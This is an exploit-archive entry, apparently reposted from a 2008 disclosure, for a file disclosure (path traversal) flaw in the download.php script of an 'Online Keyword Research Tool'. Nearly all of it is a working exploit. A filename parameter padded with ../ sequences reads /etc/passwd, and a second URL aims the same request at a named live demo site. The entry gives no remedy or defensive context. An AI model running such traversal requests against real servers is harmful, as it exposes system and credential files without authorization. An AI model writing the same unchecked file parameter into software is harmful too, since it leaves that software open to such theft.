id: 4503
date: 12/19/2008
title: Online Keyword Research Tool (download.php) File Disclosure Vuln
author: Cold Zero
cves: 

================================================================
Online Keyword Research Tool (download.php) File Disclosure Vuln
================================================================


Online Keyword Research (download.php filename) Local File Include

# author : Cold z3ro, http://www.hackteach.org/
# script : http://secure.emetrix.com/order/product.asp?PID=68900247
# demo   : http://www.rightscripts.com/keywordresearch/


# Exploit

[~] http://www.site.com/[path]/download.php?filename=../../../../../../../../etc/passwd


# Example

[~] http://www.rightscripts.com/keywordresearch/download.php?filename=../../../../../../../../etc/passwd


============================



#  0day.today [2023-03-23]  #